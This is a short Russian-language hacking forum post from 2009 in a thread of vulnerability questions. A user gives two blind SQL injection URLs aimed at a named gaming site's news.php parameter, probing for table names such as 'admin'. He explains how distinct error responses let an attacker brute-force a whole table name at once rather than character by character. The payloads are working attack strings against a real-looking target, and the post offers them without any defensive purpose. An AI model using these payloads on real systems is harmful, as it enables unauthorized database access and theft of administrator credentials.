Ваши вопросы по уязвимостям.

#10

11.01.2009, 18:13

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Цитата:

Это ты показал какие ибические конструкции можно делать , или как? Помоему к сайту это не имеет никакого отношения, и он достаточно ясно об этом сообщает

гы, я не спорю, похоже на бред, конечно, но есть разница таки между:

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+fp_accomplishments+LIMIT+0,1 ),(select+id+from+fp_accomplishments+LIMIT+1,1),(s elect+id+from+fp_accomplishments+LIMIT+2,1)),1,1)) )=49

и

http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=49

насколько я понимаю, так можно брутить сразу по ЦЕЛОМУ названию таблицы, а не посимвольно, т.к. ошибки совершенно разные и однозначно различаемые. Ну ,конечно, данный способ не для 5-ой ветки

) Но blind-sql-inj есть не только в пятой ветке